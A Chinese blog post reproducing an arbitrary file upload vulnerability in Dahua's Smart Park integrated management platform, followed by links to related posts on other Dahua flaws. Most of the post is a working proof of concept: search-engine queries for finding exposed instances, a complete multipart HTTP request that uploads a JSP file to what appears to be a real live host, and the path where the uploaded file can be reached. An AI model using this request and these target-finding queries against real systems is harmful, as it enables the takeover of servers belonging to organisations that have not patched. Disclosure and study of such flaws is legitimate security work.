首页 > 其他分享 >大华智慧园区综合管理平台 video 任意文件上传漏洞

大华智慧园区综合管理平台 video 任意文件上传漏洞

时间:2023-08-29 10:23:51浏览次数:43  
标签:-- Content 漏洞 video dd8f988919484abab3816881c55272a7 大华 上传

漏洞描述

大华 智慧园区综合管理平台 video 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限

漏洞复现

fofa语句:"/WPMS/asset/lib/gridster/"app="dahua-智慧园区综合管理平台"
鹰图语句:web.body="/WPMS/asset/lib/gridster/"
登录页面如下:

POC:

POST /publishing/publishing/material/file/video HTTP/1.1
Host: 112.29.98.167:8009
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close

--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="Test.jsp"

Test
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"

submit
--dd8f988919484abab3816881c55272a7--


上传文件后的路径:/publishingImg/VIDEO/230812152005170200.jsp

标签:--,Content,漏洞,video,dd8f988919484abab3816881c55272a7,大华,上传
From: https://www.cnblogs.com/pursue-security/p/17664075.html

相关文章

  • 大华智慧园区综合管理平台searchJson SQL注⼊漏洞
    漏洞简介大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。由于该平台未对用户输入数据做限制,攻击者可以直接将恶意代码拼接进SQL查询语句中,导致系统出......
  • 大华智慧园区综合管理平台 user_getUserInfoByUserName.action 账号密码泄漏漏洞
    漏洞简介大华智慧园区综合管理平台user_getUserInfoByUserName.action中存在API接口,导致管理园账号密码泄漏漏洞复现fofa语句:"/WPMS/asset/lib/gridster/"或app="dahua-智慧园区综合管理平台"鹰图语句:web.body="/WPMS/asset/lib/gridster/"POC:/admin/user_getUserInfoBy......
  • 大华智慧园区综合管理平台devicePoint_addImgIco任意文件上传漏洞
    漏洞简介大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格......
  • git上传大文件
    目录我尝试使用git上传4GB的文件到gitea上的时候,发现文件会再300MB左右被截断(有文件大小限制)排查发现是git端的问题,不是gitea的问题使用gitlfs解除上传大小限制打开gitbash输入命令gitlfsinstall再输入gitlfstrack"*.mp4"或者gitlfstrack"*"最后gitadd、gitp......
  • Steam++加速github,会导致github图床上传失败
    PicGo日志报错信息"message":"unabletoverifythefirstcertificate",原因软件:PIcGO图床:github加速器:Steam++(又称:WattToolkit)由于Steam++安全证书问题,会导致unabletoverifythefirstcertificate,无法验证第一证书问题。关闭加速器即可解决......
  • php 支持 超大上G,多附件上传
    ​ PHP用超级全局变量数组$_FILES来记录文件上传相关信息的。1.file_uploads=on/off 是否允许通过http方式上传文件2.max_execution_time=30 允许脚本最大执行时间,超过这个时间就会报错3.memory_limit=50M 设置脚本可以分配的最大内存量,防止失控脚本占用过多内存,此......
  • iOS IPA包的制作和上传步骤详解​
     目录 前言一、IPA包的原理二、IPA包上传的步骤1.注册开发者账号2.创建应用程序3.编码和设计4.生成证书和配置文件5.打包IPA包6.上传IPA包三、总结 前言iOSIPA包是iOS应用程序的安装包,可以通过iTunes或其他第三方应用商店安装到iOS设备上。在进行iOS应用程序......
  • ios ipa包上传需要什么工具
    ​  目录iosipa包上传需要什么工具前言一、IPA包的原理二、IPA包上传的步骤1.注册开发者账号2.apk软件制作工具创建应用程序3.构建应用程序4.生成证书和配置文件5.打包IPA包6.上传IPA包三、总结   ​ 前言     iOSIPA包是iOS应用程序的......
  • 网页实现大文件上传下载
    ​ 这里只写后端的代码,基本的思想就是,前端将文件分片,然后每次访问上传接口的时候,向后端传入参数:当前为第几块文件,和分片总数下面直接贴代码吧,一些难懂的我大部分都加上注释了:上传文件实体类:看得出来,实体类中已经有很多我们需要的功能了,还有实用的属性。如MD5秒传的信息。pub......
  • HTML5实现大文件上传下载
    ​ javaweb上传文件上传文件的jsp中的部分上传文件同样可以使用form表单向后端发请求,也可以使用ajax向后端发请求    1.通过form表单向后端发送请求         <formid="postForm"action="${pageContext.request.contextPath}/UploadServlet"method="post"e......